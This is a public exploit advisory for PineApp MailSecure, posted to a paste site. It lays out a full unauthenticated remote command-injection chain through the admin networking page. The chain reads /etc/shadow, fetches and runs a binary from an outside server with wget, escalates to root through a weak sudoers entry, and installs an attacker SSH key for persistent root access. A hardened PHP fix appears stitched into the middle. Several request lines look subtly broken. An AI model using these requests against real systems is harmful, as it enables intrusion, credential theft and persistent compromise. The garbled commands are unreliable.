PineApp MailSecure - Remote Command Execution


SUBMITTED BY: Guest

DATE: Nov. 25, 2013, 12:12 p.m.


-----------------------------------------------------------------
It is possible to execute any bash command as the unprivileged user qmailq by
sending only the following HTTPS request, without authentication:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;%20cat%20/etc/shadow
Uploading any file (script, binary, etc.) is possible with the wget command:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile
Downloading and executing it is possible with this request:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;wget%20http://server.com/somefile%20-O%20/tmp/somefile;chmod%20+x%20somefile;/tmp/somefile
Details of the bug:
Lines 115-120 of /srv/www/htdocs/admin/confnetworking.html
----------------snip-----------------
<?
$query=explode("\n",shell_exec("/usr/bin/host -t '$nstype' '$hostip' $nsserver"));
foreach ($query as $line)
if ($line)
echo preg_replace("/\t/","&nbsp;&nbsp;&nbsp;",$line)."<br>\n";
?>
----------------snip-----------------
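The snippet above hands three request parameters straight to a shell; $nsserver is not even quoted, which is why a ';' in it runs a second command. As an added example (not PineApp's code), the same lookup rewritten so that every parameter is validated against an allowlist before it reaches the shell and each one is wrapped in escapeshellarg(); the list of permitted record types, the hostname pattern and the 400 response are assumptions. It does not add the missing authentication check for /admin pages, which is a separate fix.

```php
<?php
// Added example, not the vendor's code. Hardened replacement for the
// shell_exec() call in confnetworking.html: allowlist + escapeshellarg().

// Assumed allowlist of DNS record types; the page does not say which
// values the form offers.
const ALLOWED_NSTYPES = ['a', 'aaaa', 'any', 'cname', 'mx', 'ns', 'ptr', 'soa', 'txt'];

// Accept an IP address or a plain hostname (letters, digits, '-', '.').
// Spaces, ';', quotes, backticks and '$' never pass, so nothing can break
// out of the argument even before escapeshellarg() is applied.
function is_host_or_ip(string $value): bool
{
    if (filter_var($value, FILTER_VALIDATE_IP) !== false) {
        return true;
    }
    return (bool) preg_match('/^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$/', $value);
}

// Returns the command line to run, or null when any parameter is invalid.
function build_host_command(string $nstype, string $hostip, string $nsserver): ?string
{
    $nstype = strtolower($nstype);
    if (!in_array($nstype, ALLOWED_NSTYPES, true)) {
        return null;
    }
    if (!is_host_or_ip($hostip)) {          // empty hostip is rejected too
        return null;
    }
    if ($nsserver !== '' && !is_host_or_ip($nsserver)) {
        return null;
    }
    $cmd = '/usr/bin/host -t ' . escapeshellarg($nstype) . ' ' . escapeshellarg($hostip);
    if ($nsserver !== '') {
        $cmd .= ' ' . escapeshellarg($nsserver);
    }
    return $cmd;
}

$cmd = build_host_command($_GET['nstype'] ?? '', $_GET['hostip'] ?? '', $_GET['nsserver'] ?? '');
if ($cmd === null) {
    http_response_code(400);
    exit('invalid lookup parameters');
}
foreach (explode("\n", (string) shell_exec($cmd)) as $line) {
    if ($line !== '') {
        // Tool output is untrusted as well: HTML-escape it before echoing.
        echo str_replace("\t", '&nbsp;&nbsp;&nbsp;', htmlspecialchars($line, ENT_QUOTES, 'UTF-8')), "<br>\n";
    }
}
```

With this in place the request from the advisory (nsserver=www.google.es;%20cat%20/etc/shadow) is rejected with a 400 before any process is spawned.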
It is also possible to escalate privileges to root through a weak sudoers
configuration that covers the file /tmp/rc.firewall. If you overwrite this file
with this content:
---------
#!/bin/bash
$1
---------
you get a privileged backdoor.
It is possible with the following requests:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%23!/bin/bash' > /tmp/fileheader
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'$1' > /tmp/filecode
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;mv/tmp/rc.firewall /tmp/rc.firewall_
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/fileheader /tmp/filecode > /tmp/rc.firewall
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx /tmp/rc.firewall
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/fileheader
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;rm/tmp/filecode
And execute commands as root with:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;chmod%2bx /tmp/rc.firewall 'whoami'
With this, you can send an ssh key and get access via the ssh service. To
perform this you can make the following requests:
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;echo'%73%73%68%2d%72%73%61%20%41%41%41%41%42%33%4e%7a%61%43%31%79%63%32%45%41%41%41%41%42%49%77%41%41%41%51%45%41%79%54%6f%4c%32%75%6b%51%36%4c%76%44%6a%78%51%65%4e%55%72%54%59%35%2b%51%66%57%37%47%51%52%4c%51%68%44%4f%69%77%7a%46%48%42%4a%66%33%59%66%49%44%50%6f%74%45%48%41%4d%43%7a%75%45%48%56%72%34%49%2f%41%77%52%73%78%76%4a%44%2b%4e%55%2b%2b%53%65%72%34%76%7a%35%4d%68%53%6c%50%37%64%47%53%78%47%58%39%31%37%7a%4b%53%53%4b%33%79%55%78%33%42%75%46%44%38%49%52%53%46%51%47%35%64%33%75%50%72%46%63%2f%4d%2b%33%61%37%30%4f%7a%45%44%2f%59%71%79%75%53%63%35%64%79%4c%64%67%59%32%61%47%77%6f%48%77%6a%4e%6f%5a%6b%79%65%44%77%72%67%63%2b%50%65%57%66%78%57%37%63%44%39%72%2f%4f%56%6d%38%59%49%61%70%7a%75%34%37%77%65%71%53%70%38%70%37%2b%43%58%4f%45%41%4c%64%2b%50%4e%54%79%4b%30%43%34%7a%51%58%37%72%35%6d%37%79%48%45%34%50%74%31%6f%75%41%43%45%6c%46%56%38%4a%4f%4f%45%38%4c%49%76%38%55%4a%67%57%30%43%64%41%55%4f%48%6a%49%75%2b%5a%6f%6d%35%54%71%50%73%72%6e%70%64%44%4e%59%6e%2b%76%33%6d%33%57%76%4f%50%71%36%66%69%38%61%72%79%53%33%61%4e%6e%7a%53%74%51%4e%5a%61%33%35%50%64%75%42%4a%49%39%33%4e%41%79%4f%48%54%59%54%31%75%56%6a%6c%79%55%51%3d%3d%20%72%75%62%65%6e%40%72%75%62%65%6e%2d%6c%61%70%74%6f%70' > /tmp/key.pub
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'mv /root/.ssh/authorized_keys /root/.ssh/authorized_keys_'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'cp /root/.ssh/authorized_keys /tmp'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;cat/tmp/authorized_keys /tmp/key.pub > /tmp/keys.pub
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'mv /tmp/keys.pub /root/.ssh/authorized_keys'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo/tmp/rc.firewall 'chown root:root /root/.ssh/authorized_keys'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'killall sshd'
https://192.168.24.24:7443/admin/confnetworking.html?cmd=nslookup&hostip=&nstype=any&nsserver=www.google.es;sudo%20/tmp/rc.firewall'sshd'
This key has the password '1234'.
Now you can get access with ssh as root and bring up a tun interface to the
appliance with the ssh client:
ssh root@192.168.24.24 -p 7022 -w0:0 -i /home/ruben/key
With this the attacker has a VPN on the same network segment as the vulnerable
MailSecure appliance.
-----------------------------------------------------------------
I gave a live demo of this vulnerability but did not reveal the manufacturer,
so the bugs were not fixed.
http://boken00.blogspot.com.es/2012/11/ii-conferencias-de-seguridad-navaja.html
A video demo will be released soon on my blog.
Version affected:
MailSecure <= 5099SK
Credits:
-----------
Ruben Garrote García
rubengarrote [at] gmail [dot] com
http://boken00.blogspot.com
EDB Note:
It seems version 3.70 has been patched against this.
Later versions are probably vulnerable to this.
